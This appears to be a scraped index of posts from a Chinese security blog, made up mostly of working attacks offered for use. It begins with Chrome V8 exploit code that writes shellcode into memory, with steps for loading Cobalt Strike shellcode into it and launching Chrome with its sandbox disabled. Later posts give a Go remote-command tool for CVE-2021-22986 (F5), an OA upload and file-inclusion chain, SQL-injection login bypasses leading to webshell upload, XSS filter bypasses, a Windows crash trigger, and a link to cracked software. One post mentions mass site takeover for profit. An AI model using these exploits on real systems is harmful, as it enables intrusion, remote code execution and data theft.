constructor(size) { super(size); this.slot = 0xb33f; } } function foo(a) { let x = -1; if (a) x = 0xFFFFFFFF; var arr = new Array(Math.sign(0 - Math.max(0, x, -1))); arr.shift(); let local_arr = Array(2); local_arr[0] = 5.1;//4014666666666666 let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8 arr[0] = 0x1122; return [arr, local_arr, buff]; } for (var i = 0; i < 0x10000; ++i) foo(false); gc(); gc(); [corrput_arr, rwarr, corrupt_buff] = foo(true); corrput_arr[12] = 0x22444; delete corrput_arr; function 
setbackingStore(hi, low) { rwarr[4] = i2f(fLow(rwarr[4]), hi); rwarr[5] = i2f(low, fHi(rwarr[5])); } function leakObjLow(o) { corrupt_buff.slot = o; return (fLow(rwarr[9]) - 1); } let corrupt_view = new DataView(corrupt_buff); let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff); let idx0Addr = corrupt_buffer_ptr_low - 0x10; let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000; let delta = baseAddr + 0x1c - idx0Addr; if ((delta % 8) == 0) { let baseIdx = delta / 8; this.base = fLow(rwarr[baseIdx]); } else { let baseIdx = ((delta - (delta % 8)) / 8); this.base = fHi(rwarr[baseIdx]); } let wasmInsAddr = leakObjLow(wasmInstance); setbackingStore(wasmInsAddr, this.base); let code_entry = corrupt_view.getFloat64(13 * 8, true); setbackingStore(fLow(code_entry), fHi(code_entry)); for (let i = 0; i < shellcode.length; i++) { corrupt_view.setUint8(i, shellcode[i]); } main();</script> CS开启监听 监听器随意,https的稳定 生成payload 记得勾选64位 获得C的payload 类似这样 取出 shellcode 部分 全局替换 \\ 为 ,0 然后取出来shellcode 放入 chrome 0day 中 替换后 复制出来 放入文章开头的 POC 中 第7行 给shellcode 赋值数组 保存 成 msf.html chrome 浏览器 创建快捷方式到桌面 右键编辑快捷方式 增加 -no-sandbox 参数 关闭沙箱 在chrome浏览器打开 msf.html , CS 上线! 
payload c#weijs 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167ENABLE_LOG = true;IN_WORKER = true;// run calc and hang in a loopvar shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的c#function print(data) {}var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12;});for (var i = 0; i < 0x10000; ++i) { target_function(i);}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f';}function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); }}function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null; this.page_buffer = null; this.page_view = null; this.prevent_opt = []; var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf; class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } } this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer); new RegExp({ toString: function () { return 'a' } }); cb(true); class DerivedBase extends RegExp { constructor() { // var array = null; super( // at this point, the 4-byte allocation for the JSRegExp `this` object // has just happened. { toString: cb }, 'g' // now the runtime JSRegExp constructor is called, corrupting the // JSArray. ); // this allocation will now directly follow the FixedArray allocation // made for `this.data`, which is where `array.elements` points to. 
this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } } // try{ var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; } class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } } return DerivedN; })`); gc(); new (derived_n(tDerivedNDepth))(); this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); } this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); } this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); } this.write32 = function (addr, value) { this.setPtr(addr); this.page_view.setUint32(0, value, true, ...this.prevent_opt); } this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); } this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this;}function trigger() { var oob = oobAccess(); var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16)); var kCodeInsOffset = 0x1b; var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16)); oob.setBytes(code_addr, shellcode); target_function(0);}try{ print("start running"); trigger();}catch(e){ print(e);} var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) 
gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"金和协同水平越权漏洞","slug":"金和协同水平越权漏洞","date":"2021-04-04T03:43:29.000Z","updated":"2021-04-04T03:59:22.311Z","comments":true,"path":"2021/04/04/金和协同水平越权漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/04/04/%E9%87%91%E5%92%8C%E5%8D%8F%E5%90%8C%E6%B0%B4%E5%B9%B3%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"0day 3.28 金和协同管理OA平台. 水平越权漏洞此洞是由 goddmeon 师傅挖掘并授权发表。 在此感谢 goddmeon 师傅。 FoFA语法: body=”金和协同管理平台” && country=”CN” 默认口令 admin / 000000 后台登录水平越权 C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=想要的id用户 这个id指的是用户编号 登录,用过用户管理,看到用户编号0001为董事长 这是admin管理员权限登录的界面 为了验证水平越权漏洞,我们登录一个普通用户账号,下面是普通用户登录后的界面。 访问url: 12http://www.xxxxxxx.net/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=0001 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"智慧教育越权","slug":"智慧教育越权","date":"2021-04-04T03:32:18.000Z","updated":"2021-04-04T03:33:37.215Z","comments":true,"path":"2021/04/04/智慧教育越权/","link":"","permalink":"http://bo.vuvhz.top/2021/04/04/%E6%99%BA%E6%85%A7%E6%95%99%E8%82%B2%E8%B6%8A%E6%9D%83/","excerpt":"","text":"智慧教育平台越权上传漏洞通杀拿webshell 1.fofa语法: 1/Widget/common/Service/CommonWidgetService.asmx/Categorylist 2.漏洞越权位置 1/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0 有的会提示输入账号密码,直接访问这个注册,就可以注册 1Module/SSO/SJS_Register.aspx 可以登录个人后台, 3.登录后可以重普通用户越权到admin管理员用户 4.在个人页面抓包可以发现以get方式传输 试试有没有注入或者越权就加个?id=123 ?user=miko没有注入。。。。 当把user换成admin时 既然到了admin里面,这里应该有admin的cookie吧,于是直接又登录之前的越权漏洞地址,应该能到管理员后台 5.成功了 6.找上传点改filetype标签不行,加了个aspx,改了个aspx,还是不行,于是直接抓包,掏出burp 7.传不了,图片可以传,但是aspx传的时候进度条不动,。。。。卡住了,于是做图片马aspx加图片,哦呦,进去了,但是访问后报错 
于是找大佬问问,大佬也试了一下,大佬用的asp加图片,于是我也改asp加图片嘿嘿 8.成功拿下webshell 目前发现这套模板可以写个批量拿站脚本,日收益会很不错,有些这个模板已经修复了,但是查找的高达90%都有这些漏洞。 漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞 https://mp.weixin.qq.com/s?__biz=Mzg5NjU3NzE3OQ==&mid=2247484986&idx=1&sn=55c43e01fb9cce6962272045c263fd83&chksm=c07fbdcef70834d8869f57ebd926e4237fb4379b317ac7aaa271a68c20ce99a5b054c283c7df&mpshare=1&scene=23&srcid=0404byavRK4wQ0q01VcNxxQ5&sharer_sharetime=1617496800125&sharer_shareid=f18a0e6ff07a610f239caab878f64be5#rd var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"通达OA_v11.7文件上传","slug":"通达OA","date":"2021-03-23T13:38:16.000Z","updated":"2021-03-23T13:39:10.659Z","comments":true,"path":"2021/03/23/通达OA/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/%E9%80%9A%E8%BE%BEOA/","excerpt":"","text":"通达OA_v11.7 文件上传+文件包含 通达OA_v11.7 文件上传+文件包含1.任意用户登录 12/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 2.文件上传(后台) 123456789101112131415161718POST /general/reportshop/utils/upload.php?action=upload&newid=/../../../../general/reportshop/workshop/report/attachment-remark/ HTTP/1.1Host: 192.168.238.141Content-Length: 197Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk6YsCa9EZHcaYYulAccept: */*Accept-Encoding: gzip, deflateCookie:PHPSESSID=e30i0923fb8vol34kldc0sqhn7Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Connection: close------WebKitFormBoundaryk6YsCa9EZHcaYYulContent-Disposition: form-data; name="FILE1"; filename="ceshi.txt"Content-Type: text/plainhello 
world------WebKitFormBoundaryk6YsCa9EZHcaYYul-- 3.文件包含(后台) 12/ispirit/interface/gateway.php?json={}&url=general/reportshop/workshop/report/attachment-remark/}_ceshi.txt 利用链已在工具中更新 相对于redis那条利用链, 可优先使用它 和其他版本一样, 获取cookie后点击”后台getshell”即可(会自动识别v11.7版本的) 圈子专版 链接:https://pan.baidu.com/s/1VIuJ-5dZ0ENtpvUTfI-Vmw提取码:rjhd GitHub项目地址https://github.com/xinyu2428/TDOA_RCE var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2021-22986复现","slug":"CVE-2021-22986","date":"2021-03-23T13:34:37.000Z","updated":"2021-03-23T13:35:31.819Z","comments":true,"path":"2021/03/23/CVE-2021-22986/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/CVE-2021-22986/","excerpt":"","text":"CVE-2021-22986 复现数据包如下: 1234567891011POST /mgmt/tm/util/bash HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)Accept: */*Connection: closeAuthorization: Basic YWRtaW46X-F5-Auth-Token: Content-Length: 46Content-Type: application/json{"command": "run", "utilCmdArgs": "-c id"} 工具使用 go 简单写一下,代码有点 low 下载地址:https://github.com/yuyan-sec/Poc-Project/tree/main/F5相关代码: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778package mainimport ( "fmt" "net/http" "io/ioutil" "crypto/tls" "time" "bytes" "regexp" "strings" "flag")func main(){ var host,cmd string flag.StringVar(&host,"u","","URL: http://127.0.0.1") flag.StringVar(&cmd,"c","","CMD: id") flag.Parse() if host == "" || cmd == ""{ fmt.Println(`███████╗███████╗ ██████╗ ██████╗███████╗██╔════╝██╔════╝ ██╔══██╗██╔════╝██╔════╝█████╗ ███████╗ ██████╔╝██║ █████╗ ██╔══╝ ╚════██║ ██╔══██╗██║ ██╔══╝ 
██║ ███████║ ██║ ██║╚██████╗███████╗╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ CVE-2021-22986 Author: @yuyan-sec`) }else{ exp(host,cmd) }}func exp(url, cmd string){ t := &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, } c := &http.Client{ Transport: t, Timeout: 5 * time.Second, } url = strings.TrimRight(url,"/") url = url + "/mgmt/tm/util/bash" payload := []byte("{\\"command\\": \\"run\\", \\"utilCmdArgs\\": \\"-c "+ cmd +"\\"}") r, err := http.NewRequest("POST", url, bytes.NewBuffer(payload)) r.Header.Set("Content-Type", "application/json") r.Header.Set("X-F5-Auth-Token", "") r.Header.Set("Authorization", "Basic YWRtaW46") resp, err := c.Do(r) if err != nil{ return } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil{ return } if resp.StatusCode == 200{ reg := regexp.MustCompile(`"commandResult":"(.*?)\\\\n`) commandResult := reg.FindAllStringSubmatch(string(body),-1) result := commandResult[0][1] result = strings.Replace(result,"context=system_u:system_r:initrc_t:s0","",-1) fmt.Println(result) }else{ fmt.Println("fail") }} [转]@yuyan大佬 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"MessageSolution邮件bug","slug":"MessageSolution","date":"2021-03-23T13:31:20.000Z","updated":"2021-03-23T13:32:43.615Z","comments":true,"path":"2021/03/23/MessageSolution/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/MessageSolution/","excerpt":"","text":"MessageSolution邮件归档系统EEA 信息泄露漏洞 Goby脚本编写简介:MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码. 
搜索语法 1title="MessageSolution Enterprise Email Archiving (EEA)" 漏洞地址http://ip:port/authenticationserverservlet/漏洞验证 得到一个管理员的账户密码 一个用户的账户密码 Goby脚本编写 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859{ "Name": "MessageSolution-Information-leakage", "Level": "3", "Tags": [], "GobyQuery": "title=\\"MessageSolution Enterprise Email Archiving (EEA)\\"", "Description": "", "Product": "", "Homepage": "https://www.secquan.org/", "Author": "Jaky", "Impact": "", "Recommandation": "", "References": [ "https://www.secquan.org/" ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/authenticationserverservlet/", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "regex", "value": "username", "bz": "" }, { "type": "item", "variable": "$body", "operation": "regex", "value": "password", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "2021-03-23 08:44:36", "GobyVersion": "1.8.255"} 脚本存放脚本验证 [转]@Jaky大佬 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"phpstudy后门","slug":"phpstudy后门","date":"2021-03-09T10:57:47.000Z","updated":"2021-03-09T11:23:09.348Z","comments":true,"path":"2021/03/09/phpstudy后门/","link":"","permalink":"http://bo.vuvhz.top/2021/03/09/phpstudy%E5%90%8E%E9%97%A8/","excerpt":"","text":"#phpstudy后门利用创建靶机使用burp抓取数据包 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: 
'6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"锐捷RG-UAC","slug":"锐捷RG-UAC","date":"2021-03-09T10:47:53.000Z","updated":"2021-03-09T10:48:36.708Z","comments":true,"path":"2021/03/09/锐捷RG-UAC/","link":"","permalink":"http://bo.vuvhz.top/2021/03/09/%E9%94%90%E6%8D%B7RG-UAC/","excerpt":"","text":"#CNVD-2021-14536锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞 FOFA:title=\"RG-UAC登录页面\" && body=\"admin\" #检测#POC也没啥可POC的,ctrl+shift+i或者F12就是了接下来是欣赏马赛克的环节 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"驾校通网上约车系统漏洞分享","slug":"驾校通网系统漏洞","date":"2021-03-07T13:59:18.000Z","updated":"2021-03-07T14:09:50.860Z","comments":true,"path":"2021/03/07/驾校通网系统漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/%E9%A9%BE%E6%A0%A1%E9%80%9A%E7%BD%91%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#驾校通网上约车系统漏洞分享1039家校通网上约车系统是一款驾校一体化系统。北京壹零叁玖科技发展有限公司(简称1039公司)是国内第一家专业从事培训行业标准化软件开发和大型应用性平台的高科技企业,是培训行业信息化建设的最佳合作伙伴。 Google Hack: intitle: 1039家校通 ###漏洞利用###SQL注入万能密码影响版本: 家校通v1.0 - v.6.0 登录接口 /admin/Product/Comstye.aspx /Student/StudentLogin.aspx /Teacher/Index.aspx ###管理员 用户名密码均输入: ‘ or ‘’=’ (都是单引号)可直接进入。登陆后可任意修改网站内容 ###教练点评处存在SQL注入 /Teacher/TeacherPf.aspx?yid=0030 ###管理员后台增加分类处存在SQL注入# /admin/Product/comstye2.aspx /admin/yk/Index.aspx 配合SQL万能密码进入后台,然后访问:###后台管理编辑器任意文件上传上传文件 Burp抓包重放数据 模块,可以看到上传的地址; 访问路径 就是大马的地址WOW GETSHELL! 
var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2021-21972","slug":"CVE-2021-21972","date":"2021-03-07T13:56:13.000Z","updated":"2021-03-09T10:59:19.844Z","comments":true,"path":"2021/03/07/CVE-2021-21972/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/CVE-2021-21972/","excerpt":"","text":"#CVE-2021-21972 Vmware vCenter 图形化POC批量扫描工具#工具界面: (直接把.txt文件拖入进去就可以。。。)###下载地址:https://github.com/admin360bug/GUI-POC-EXP/####关于EXP:已编译完成,脱离python环境可用的工具 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"通达OAv11.7在线用户登录漏洞","slug":"通达OA登录漏洞","date":"2021-03-07T13:54:15.000Z","updated":"2021-03-09T10:41:18.732Z","comments":true,"path":"2021/03/07/通达OA登录漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#通达OA v11.7 在线用户登录漏洞###漏洞描述通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统###漏洞影响通达OA < v11.7 ###环境搭建https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe下载后按步骤安装即可###漏洞复现漏洞有关文件 
MYOA\\webroot\\mobile\\auth_mobi.php","categories":[],"tags":[]},{"title":"Appscan_10.0.4破解版","slug":"Appscan-10-0-4破解版","date":"2021-03-07T13:47:41.000Z","updated":"2021-03-07T13:48:17.132Z","comments":true,"path":"2021/03/07/Appscan-10-0-4破解版/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/Appscan-10-0-4%E7%A0%B4%E8%A7%A3%E7%89%88/","excerpt":"","text":"#AppScan_10.0.4破解版 链接:链接:https://pan.baidu.com/s/1RarULLWDgijG3E1_KKMUBw提取码:53g8 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"foha批量查询脚本","slug":"foha","date":"2021-01-30T09:05:49.000Z","updated":"2021-03-07T13:32:23.371Z","comments":true,"path":"2021/01/30/foha/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/foha/","excerpt":"","text":"#分享一下fofa的批量查询脚本 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859#!/usr/bin/python3# -*- coding: utf-8 -*-# Author : 诚默import base64import jsonimport timeimport pandas as pdimport requestsfofa_mail = ''#通过fofa个人资料中获取fofa_key = ''#fofa_list = ['title', 'header', 'body', 'domain', 'icon_hash', 'host', 'port', 'ip', 'status_code', 'protocol', 'city', 'region', 'country', 'cert', 'banner', 'typ', 'os', 'server', 'app', 'after', 'asn', 'org', 'base_protocol', 'is_ipv6', 'is_domain', 'ip_ports', 'port_size', 'port_size_gt', 'port_size_lt', 'ip_country', 'ip_region', 'ip_city', 'ip_after', 'ip_before' ]def fofaapi(select): # 进行调用 page = 1 # 爬取几页数据,size为每页个数 size = 10 # 高级会员最大爬取前10000个 fields = "host,ip,port,title,country_name" # 返回的数据列 full = 'false' # 显示所有的数据,false显示当年的 base64_str = base64.b64encode(select.encode("utf-8")).decode('utf-8') api_url = 
'https://fofa.so/api/v1/search/all?email=' + fofa_mail + '&key=' + fofa_key + '&qbase64=' + base64_str + '&fields=' + fields + '&size=' + str( size) + '&page=' + str(page) + '&full=' + full r = requests.get(api_url) # 提交请求 text = json.loads(r.text.encode('gbk', 'ignore').decode('gbk')) # 获得dict数据 print(text) # 后续为写入表 columns = fields.split(',') # 数据列名 excel_list = text['results'] excel_list.insert(0, ["查询语句:" + str(select) + " 页数:" + str(page) + " 每页:" + str(size)]) # 写入初始的查询语句 dt = pd.DataFrame(excel_list, columns=columns) file = 'fofa' + time.strftime('%Y%m%d%H%M%S', time.localtime(time.time())) # 文件名为fofa+时间 dt.to_excel(file + ".xlsx", index=1, engine='xlsxwriter') #return textdef getselect(str):#格式化 select = "" comma_list = str.split(',') # 以逗号分组 (ip=1.1.1.1 | domain=baidu.com) for item in comma_list: equal_list = item.split('=') # 等号分组 ip | 1.1.1.1 if equal_list[0] in fofa_list: # 属性存在,等号合规 select += item + " && " else: return False return select.rstrip(' && ') # 去除多余符号def main(): str = "domain=baidu.com" str1 = "ip=61.135.186.217,domain=baidu.com" if getselect(str1) != False: # 进行数据处理,数据合规就进行下一步操作 fofaapi(getselect(str1))if __name__ == '__main__': main() 文件结果如下,可根据需求改动 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"存储xss挖掘经验","slug":"xss","date":"2021-01-30T08:58:23.000Z","updated":"2021-03-07T13:33:01.475Z","comments":true,"path":"2021/01/30/xss/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/xss/","excerpt":"","text":"#存储xss挖掘经验 结合这几天挖掘的src xss稍微总结一下存储xss的挖掘经验 出现位置#一般都是有框就X 例如站内信功能 评论功能等个人喜欢先填写一个<img src=1>看看解析不解析img标签 或者实体编码 进行判断xss的存在,有些厂商一般不会ban img a这种标签,只会ban 
alert,或者onclick,onload,onerror这种事件属性, 有些地方会进行一个前台校验输入是否合法 但是后端没有进行判断,例如下图 我们就可以在前台输入一个正常的数据例如aaa都可以 然后抓包修改 就可以进行绕过 或者还有一些地方有输入长度限制,可以f12修改一下maxlength看看输入payload之后提交后能不能正常的进行保存 如果能进行保存成功的话那就又是前端校验 或者通过事件进行缩短payload #payload的绕过 https://www.cnblogs.com/H4ck3R-XiX/p/12732356.html 我觉得这篇文章是一篇不错的总结 如果输入一个很明显是有害的payload如:<script>alert('xss')</script 之类的可能会将script alert这类危险字符进行一个分割或者加点之类的 这里script被分割 无法触发payload 这里用点进行了分割 这时候我们可以进行一个编码绕过 例如<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;/xss/&#41;>aaaa 至于编码绕过上面这篇文章已经总结的很详细了。 #如何触发payload?耐心很重要,例如上面的一个例子 我将自己的姓名修改为xss payload发现并没有解析 差点让我痛失一个中危- - 后面我发现这个站有评论功能 我奇怪的发现当我随便评论一个东西的时候 他解析了img标签 也就是说评论时是带姓名来评论的 而这里又没有任何的过滤 可以说是形成了一个二次xss吧 接下就只需要将payload替换成弹窗或者引入外部js什么的 就能直接起飞了 因为这个位置没有任何的过滤 还有一种常见的就是厂商在前台进行了校验 而忽略了后台的校验 例如 我一般喜欢用两个账号测试xss 一个账号发布 然后另一个账号测试 在评论处输入payload是没什么反应的 但是当我进入发布者的后台时候发现弹窗了这样一个存储xss也就到手了 总之就是多去测试 尽量寻找可能触发payload的地方 遇到实体编码的地方就可以去寻找其他一些可能触发payload的位置 [转] var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"win10蓝屏bug","slug":"win10蓝屏bug","date":"2021-01-30T08:14:21.000Z","updated":"2021-03-07T13:32:42.879Z","comments":true,"path":"2021/01/30/win10蓝屏bug/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/win10%E8%93%9D%E5%B1%8Fbug/","excerpt":"","text":"#win10蓝屏bug最近win10 的蓝屏bug最近很火,在google浏览器中输入: \\\\.\\globalroot\\device\\condrv\\kernelconnect 就会蓝屏,亲测有效; 看到吾爱中分析解释说是condrv驱动里的派遣函数CdpDispatchCleanup发生了空指针引用,而后触发了蓝屏。 因为谷歌浏览器调用了GetFileAttributesExW函数,然后转入ntdll,接着走进了内核,然后调用了condrv的派遣函数。 12345678<html><head></head><body>><script>document.location = 
'\\\\\\\\.\\\\globalroot\\\\device\\\\condrv\\\\kernelconnect';</script></body></html> 有师傅分享了代码: 12345678910/ BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。//#include <iostream>#include <Windows.h>int main(){ WCHAR fileName[] = L"\\\\\\\\.\\\\globalroot\\\\device\\\\condrv\\\\kernelconnect"; WIN32_FILE_ATTRIBUTE_DATA data; GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);} 直接编译成exe文件: 运行生成的exe文件,成功蓝屏:好像没看到可以利用此漏洞来远程执行代码的,希望win10早点修复这个bug呗。 参考链接:https://www.52pojie.cn/thread-1354077-1-1.html var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) 